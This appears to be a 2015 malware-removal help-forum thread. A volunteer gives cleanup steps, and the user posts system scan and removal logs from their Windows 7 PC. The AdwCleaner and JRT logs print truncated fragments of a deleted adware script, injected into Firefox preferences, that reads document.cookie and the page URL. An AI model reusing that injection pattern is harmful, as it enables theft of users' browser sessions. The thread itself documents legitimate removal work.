[2015/02/01 15:07:49 | 000,671,314 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2015/02/01 15:07:49 | 000,126,440 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2015/02/01 15:07:32 | 000,796,158 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[8 C:\Windows\SysNative\*.tmp files -> C:\Windows\SysNative\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2015/02/10 07:39:25 | 000,000,448 | ---- | C] () -- C:\Windows\SysWow64\iolo.ini
[2015/02/10 07:39:25 | 000,000,448 | ---- | C] () -- C:\Windows\SysNative\iolo.ini
[2015/02/10 07:21:39 | 000,001,487 | ---- | C] () -- C:\Users\Becky's\Desktop\LiveBoost.lnk
[2015/02/09 17:14:25 | 000,000,340 | ---- | C] () -- C:\Windows\tasks\HPCeeScheduleForBecky's.job
[2013/10/06 16:06:03 | 000,000,095 | ---- | C] () -- C:\Users\Becky's\AppData\Local\fusioncache.dat
[2013/10/05 14:38:32 | 000,788,216 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/01/15 16:01:20 | 001,256,617 | ---- | C] () -- C:\Users\Becky's\AppData\Local\tmpPICTURE 054.JPG
[2011/10/23 19:09:20 | 000,000,632 | RHS- | C] () -- C:\Users\Becky's\ntuser.pol
[2011/04/26 18:50:30 | 000,223,076 | ---- | C] () -- C:\Users\Becky's\AppData\Local\tmp0416011527.2
[2011/04/26 18:50:29 | 000,220,848 | ---- | C] () -- C:\Users\Becky's\AppData\Local\tmp0416011527.1
[2011/04/26 18:50:26 | 000,238,344 | ---- | C] () -- C:\Users\Becky's\AppData\Local\tmp0416011527.0
[2011/04/26 18:50:26 | 000,220,847 | ---- | C] () -- C:\Users\Becky's\AppData\Local\tmp0416011527.JPG
[2010/12/01 14:44:28 | 000,007,617 | ---- | C] () -- C:\Users\Becky's\AppData\Local\Resmon.ResmonCfg
[2010/01/13 17:20:46 | 000,001,050 | ---- | C] () -- C:\Users\Becky's\AppData\Roaming\wklnhst.dat
 
========== ZeroAccess Check ==========
 
[2009/07/13 22:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/24 20:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/24 19:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 19:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 06:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 19:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2015/02/10 07:19:42 | 000,000,000 | ---D | M] -- C:\Users\Becky's\AppData\Roaming\iolo
[2013/12/15 11:48:57 | 000,000,000 | ---D | M] -- C:\Users\Becky's\AppData\Roaming\ioloGovernor
[2011/10/16 18:36:40 | 000,000,000 | ---D | M] -- C:\Users\Becky's\AppData\Roaming\MP3Rocket
[2014/11/06 19:02:17 | 000,000,000 | ---D | M] -- C:\Users\Becky's\AppData\Roaming\OpenCandy
[2014/11/06 19:03:04 | 000,000,000 | ---D | M] -- C:\Users\Becky's\AppData\Roaming\PowerISO
[2010/01/13 17:20:53 | 000,000,000 | ---D | M] -- C:\Users\Becky's\AppData\Roaming\Template
[2013/11/21 12:11:46 | 000,000,000 | ---D | M] -- C:\Users\Becky's\AppData\Roaming\uTorrent
[2010/01/13 16:43:50 | 000,000,000 | ---D | M] -- C:\Users\Becky's\AppData\Roaming\WildTangent
[2010/05/04 23:11:47 | 000,000,000 | ---D | M] -- C:\Users\Becky's\AppData\Roaming\WinBatch
[2011/11/04 17:58:13 | 000,000,000 | -HSD | M] -- C:\Users\Everyone else\AppData\Roaming\.#
[2011/10/26 13:51:08 | 000,000,000 | ---D | M] -- C:\Users\Everyone else\AppData\Roaming\iolo
[2012/11/13 17:38:09 | 000,000,000 | ---D | M] -- C:\Users\Everyone else\AppData\Roaming\Template
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 174 bytes -> C:\ProgramData\Temp:DFC5A2B2
@Alternate Data Stream - 109 bytes -> C:\ProgramData\Temp:A8ADE5D8

< End of report >
 

 

 


  • 0

Advertisements

#2
BrianDrab
Posted 11 February 2015 - 11:25 AM

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

Hi. My name is Brian, and I would be happy to look into your issue.
 


- General Instructions -


  • Please read all instructions and fixes thoroughly. Read the ENTIRE post BEFORE performing any steps so you understand all that needs to be done.
  • I would advise printing any instructions for easy reference as some of the fixes may require you to boot in Safe mode. Access to these instructions may not be available in Safe Mode.
  • Any fixes provided by myself are for this log file only and should not be used on any other systems.
  • Do not run any other removal software or perform updates other than the ones I provide, as it will complicate the cleaning process.
  • It's very likely that part of our cleanup will include emptying your recycle bin. If you use your recycle bin as an archive and do not wish this to be emptied, please let me know.
  • You have 4 days to reply to each post or the topic will be closed. You will be able to request that the topic be re-opened by sending me a PM (Personal Message) or PM a moderator.
  • Please feel free to ask any questions, especially if you are having problems with my instructions.


- Save ALL Tools to your Desktop-



All tools that I have you download should be placed on the desktop unless otherwise stated. If you are familiar with how to save files to the desktop then you can skip this step.
 
Since you are continuing with this step then I assume you are unfamiliar with saving files to your desktop. As a result it's easiest if you configure your browser(s) to download any tools to the desktop by default. Please use the appropriate instructions below depending on the browser you are using.
Chrome.JPGGoogle Chrome - Click the "Customize and control Google Chrome" button in the upper right-corner of the browser.Settings.JPG Choose Settings. at the bottom of the screen click the
"Show advanced settings..." link. Scroll down to find the Downloads section and click the Change... button. Select your desktop and click OK.
Firefox.JPGMozilla Firefox - Click the "Open Menu" button in the upper right-corner of the browser. Settings.JPG Choose Options. In the downloads section, click the Browse button, click on the Desktop folder
and the click the "Select Folder" button. Click OK to get out of the Options menu.
IE.jpgInternet Explorer - Click the Tools menu in the upper right-corner of the browser. Tools.JPG Select View downloads. Select the Options link in the lower left of the window. Click Browse and
select the Desktop and then choose the Select Folder button. Click OK to get out of the download options screen and then click Close to get out of the View Downloads screen.
NOTE: IE8 Does not support changing download locations in this manner. You will need to download the tool(s) to the default folder, usually Downloads, then copy them to the desktop.
 

- Finally Before We Start-


 
Removing malware is a complicated multiple step process, Please stay with me until I have declared your system clean. I strongly recommend you backup your personal files and folders. Although rare, attempting to remove malware can render your machine unbootable or cause data loss. Having backups of your data is your responsibility. Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.

 

 

 

I'm putting some instructions together for you right now.


  • 0

#3
BrianDrab
Posted 11 February 2015 - 11:27 AM

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

Please do the following.

 

Step#1 - AdWCleaner
1. Please download AdwCleaner by Xplode onto your desktop.
2. Close all open programs and internet browsers.
3. Right-click on AdwCleaner.exe and select Run as administrator to run the tool.
4. Click on Scan.
5. After the scan is complete click on "Clean"
6. Confirm each time with Ok.
7. Your computer will be rebooted automatically. A text file will open after the restart.
8. Please post the content of that logfile with your next answer.
9. If need be, you can also find the logfile at C:\AdwCleaner\AdwCleaner[S0].txt as well.

 

 

Step#2 - JRT
 1. Download Junkware Removal Tool to your desktop.
2. Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
3, The tool will open and start scanning your system.
4. Please be patient as this can take a while to complete depending on your system's specifications.
5. On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
6. Close the text file and reboot your machine.
7. After your machine is rebooted, please re-enable your antivirus.
8. Post the contents of JRT.txt into your next message.

 

Step#3 - Rootkit Scan
1. Download aswMBR to your desktop.
2. Right-click on aswMBR.exe and select Run as administrator to run it.
3. If you get a question about Virtualization Technology, answer Yes.
4. If you see this question: Would you like to download latest Avast! virus definitions?" say "Yes".
5. Click the "Scan" button to start scan.
6. On completion of the scan click "Save log", save it to your desktop and post in your next reply.
NOTE. aswMBR will create MBR.dat file on your desktop. This is a copy of your MBR. Do NOT delete it.

 

Step#4 - FRST Scan
1. Please download Farbar Recovery Scan Tool and save it to your Desktop.
    Note: You need to run the 64-bit Version so please ensure you download that one.
2. Right click to run as administrator. When the tool opens click Yes to disclaimer.
3. Please ensure you place a check mark in the Addition.txt check box at the bottom of the form before running (if not already).
4. Press Scan button.
5. It will produce a log called FRST.txt in the same directory the tool is run from (which should now be the desktop)
6. Please copy and paste log back here.
7. Another log (Addition.txt - also located in the same directory as FRST64.exe) will be generated Please also paste that along with the FRST.txt into your reply.

 

 

 

Items for your next post

1. AdwCleaner log

2. Junkware log

3. Rootkit Scan log

4. FRST and Addition logs


  • 0

#4
DrkMachine
Posted 11 February 2015 - 05:12 PM

DrkMachine

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 126 posts

Hi Brian, thanks for your assistance. Here are the requested logs.

AdwCleaner

 

# AdwCleaner v4.110 - Logfile created 11/02/2015 at 14:03:27
# Updated 05/02/2015 by Xplode
# Database : 2015-02-09.1 [Server]
# Operating system : Windows 7 Home Premium Service Pack 1 (x64)
# Username : Becky's - BETTYSDESKTOP-P
# Running from : C:\Users\Becky's\Desktop\AdwCleaner.exe
# Option : Cleaning

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\374311380
Folder Deleted : C:\ProgramData\FlexibleShopper
Folder Deleted : C:\ProgramData\GoldenCoupon
Folder Deleted : C:\ProgramData\894336378694988169
Folder Deleted : C:\Program Files (x86)\Optimizer Pro
Folder Deleted : C:\Program Files (x86)\Coupons
Folder Deleted : C:\Program Files (x86)\FlexibleShopper
Folder Deleted : C:\Program Files (x86)\ddeaulapeakk
Folder Deleted : C:\Program Files (x86)\Deealpeak
Folder Deleted : C:\Users\Becky's\AppData\Local\Temp\AskSearch
Folder Deleted : C:\Users\Becky's\AppData\LocalLow\Toolbar4
Folder Deleted : C:\Users\Becky's\AppData\Roaming\OpenCandy
Folder Deleted : C:\Users\Becky's\Documents\Optimizer Pro
Folder Deleted : C:\Users\Everyone else\AppData\LocalLow\AskToolbar
Folder Deleted : C:\Users\Everyone else\AppData\Roaming\Mozilla\Firefox\Profiles\i71iguyh.default\Extensions\[email protected]
Folder Deleted : C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\eokkoajdojoligedidinemfgbcmmhlfj
File Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eBay.lnk
File Deleted : C:\Users\Becky's\AppData\Roaming\Mozilla\Firefox\Profiles\rcg3pbqg.default\searchplugins\bingp.xml

***** [ Scheduled tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\superfish.com
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.superfish.com
Key Deleted : HKLM\SOFTWARE\Classes\AppID\TbCommonUtils.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\TbHelper.EXE
Key Deleted : HKLM\SOFTWARE\Classes\Pc280185a_c8e2_4891_ac1a_8a98e09ccc8a_.Pc280185a_c8e2_4891_ac1a_8a98e09ccc8a_
Key Deleted : HKLM\SOFTWARE\Classes\Pc280185a_c8e2_4891_ac1a_8a98e09ccc8a_.Pc280185a_c8e2_4891_ac1a_8a98e09ccc8a_.9
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{4CE516A7-F7AC-4628-B411-8F886DC5733E}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{c280185a-c8e2-4891-ac1a-8a98e09ccc8a}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{01221FCC-4BFB-461C-B08C-F6D2DF309921}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0FA32667-9A8A-4E9C-902F-CA3323180003}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{2A42D13C-D427-4787-821B-CF6973855778}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3408AC0D-510E-4808-8F7B-6B70B1F88534}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{452AE416-9A97-44CA-93DA-D0F15C36254F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4897BBA6-48D9-468C-8EFA-846275D7701B}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c280185a-c8e2-4891-ac1a-8a98e09ccc8a}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{c280185a-c8e2-4891-ac1a-8a98e09ccc8a}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{c280185a-c8e2-4891-ac1a-8a98e09ccc8a}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{c280185a-c8e2-4891-ac1a-8a98e09ccc8a}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{AE07101B-46D4-4A98-AF68-0333EA26E113}]
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{01221FCC-4BFB-461C-B08C-F6D2DF309921}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{0FA32667-9A8A-4E9C-902F-CA3323180003}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{2A42D13C-D427-4787-821B-CF6973855778}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3408AC0D-510E-4808-8F7B-6B70B1F88534}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{452AE416-9A97-44CA-93DA-D0F15C36254F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4897BBA6-48D9-468C-8EFA-846275D7701B}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
Value Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{AE07101B-46D4-4A98-AF68-0333EA26E113}]
Key Deleted : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{A18DC704-6BAD-4A58-8E45-842A87CB5324}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A18DC704-6BAD-4A58-8E45-842A87CB5324}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A18DC704-6BAD-4A58-8E45-842A87CB5324}
Key Deleted : HKCU\Software\Optimizer Pro
Key Deleted : HKCU\Software\SearchProtectINT
Key Deleted : HKCU\Software\Softonic
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3152E1F19977892449DC968802CE8964
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\649A52D257CA5DB4EAAE8BA9EB23E467
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\linkuryjs.info

***** [ Web browsers ] *****

-\\ Internet Explorer v11.0.9600.17496


-\\ Mozilla Firefox v33.0.3 (x86 en-US)

[rcg3pbqg.default\prefs.js] - Line Deleted : user_pref("browser.startup.homepage", "hxxp://search.yahoo.com/?type=293224&fr=spigot-yhp-ff");
[i71iguyh.default\prefs.js] - Line Deleted : user_pref("extensions.tJm2MTcJYn5WRdHV.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.indexOf(\[...]

-\\ Google Chrome v

[C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\preferences] - Deleted [Homepage] : hxxp://search.yahoo.com/?type=293224&fr=spigot-yhp-ch

*************************

AdwCleaner[R0].txt - [9629 bytes] - [11/02/2015 13:58:46]
AdwCleaner[S0].txt - [9031 bytes] - [11/02/2015 14:03:27]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [9090  bytes] ##########
 

Junkware

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.4.2 (02.02.2015:1)
OS: Windows 7 Home Premium x64
Ran by Becky's on Wed 02/11/2015 at 14:39:37.10
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values

Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL



~~~ Registry Keys



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\Program Files (x86)\Common Files\homepage protection"



~~~ FireFox

Successfully deleted the following from C:\Users\Becky's\AppData\Roaming\mozilla\firefox\profiles\rcg3pbqg.default\prefs.js

user_pref("extensions.tJm2MTcJYn5WRdHV.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"rjnHqTk9pjwGqjs4rHs9rHUGpdC\")>-1||u
Emptied folder: C:\Users\Becky's\AppData\Roaming\mozilla\firefox\profiles\rcg3pbqg.default\minidumps [3 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 02/11/2015 at 14:51:34.41
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

Rootkit Scan

 

aswMBR version 1.0.1.2252 Copyright© 2014 AVAST Software
Run date: 2015-02-11 15:41:46
-----------------------------
15:41:46.284    OS Version: Windows x64 6.1.7601 Service Pack 1
15:41:46.284    Number of processors: 1 586 0x7F02
15:41:46.284    ComputerName: BETTYSDESKTOP-P  UserName: Becky's
15:41:49.497    Initialize success
15:41:49.700    VM: initialized successfully
15:41:49.700    VM: Amd CPU virtualization not supported
15:44:33.843    AVAST engine defs: 15021101
15:44:42.673    Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\00000058
15:44:42.720    Disk 0 Vendor: Hitachi_ ST2O Size: 305245MB BusType: 3
15:44:43.203    Disk 0 MBR read successfully
15:44:43.203    Disk 0 MBR scan
15:44:44.701    Disk 0 unknown MBR code
15:44:44.763    Disk 0 Partition 1 80 (A) 07    HPFS/NTFS NTFS          100 MB offset 2048
15:44:44.873    Disk 0 default boot code
15:44:45.372    Disk 0 Partition 2 00     07    HPFS/NTFS NTFS       292917 MB offset 206848
15:44:45.497    Disk 0 Partition 3 00     07    HPFS/NTFS NTFS        12226 MB offset 600100864
15:44:46.214    Disk 0 scanning C:\Windows\system32\drivers
15:46:18.239    Service scanning
15:48:05.005    Modules scanning
15:48:05.099    Disk 0 trace - called modules:
15:48:05.161    ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys storport.sys hal.dll nvstor64.sys
15:48:05.192    1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa80018086a0]
15:48:05.208    3 CLASSPNP.SYS[fffff8800199d43f] -> nt!IofCallDriver -> [0xfffffa8000ad6e40]
15:48:05.208    5 ACPI.sys[fffff88000f8f7a1] -> nt!IofCallDriver -> \Device\00000058[0xfffffa80015006d0]
15:48:08.016    AVAST engine scan C:\Windows
15:48:20.184    AVAST engine scan C:\Windows\system32
16:00:00.593    AVAST engine scan C:\Windows\system32\drivers
16:00:47.954    AVAST engine scan C:\Users\Becky's
16:21:13.865    AVAST engine scan C:\ProgramData
16:52:32.292    Disk 0 statistics 3763230/0/0 @ 2.23 MB/s
16:52:32.666    Scan finished successfully
16:54:38.823    Disk 0 MBR has been saved successfully to "C:\Users\Becky's\Desktop\MBR.dat"
16:54:39.135    The log file has been saved successfully to "C:\Users\Becky's\Desktop\aswMBR.txt"


FRST

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 11-02-2015 02
Ran by Becky's (administrator) on BETTYSDESKTOP-P on 11-02-2015 16:56:00
Running from C:\Users\Becky's\Desktop
Loaded Profiles: Becky's (Available profiles: Becky's & Everyone else)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(CYREN Inc.) C:\Program Files\Common Files\Commtouch\AntiVirus5\vsedsps.exe
(CYREN Inc.) C:\Program Files\Common Files\Commtouch\AntiVirus5\vseamps.exe
(iolo technologies, LLC) C:\Program Files (x86)\iolo\Common\Lib\ioloServiceManager.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(iolo technologies, LLC) C:\Program Files (x86)\iolo\System Mechanic Professional\LiveBoost.exe
(iolo technologies, LLC) C:\Program Files (x86)\iolo\System Mechanic Professional\System Shield\ioloSSTray.exe
(iolo technologies, LLC) C:\Program Files (x86)\iolo\System Mechanic Professional\ioloGovernor64.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\dpupdchk.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610360 2009-07-08] ()
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe [652624 2007-10-25] (CANON INC.)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [2417032 2011-08-01] (Microsoft Corporation)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\MountPoints2: J - J:\autorun.exe
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\MountPoints2: {0695f9ff-5330-11e0-9762-0026188d6f6f} - J:\setup.exe -a
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\MountPoints2: {0695fb71-5330-11e0-9762-0026188d6f6f} - J:\setup.exe -a
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\MountPoints2: {a26571d6-4b54-11e3-a674-0026188d6f6f} - K:\VZW_Software_upgrade_assistant.exe
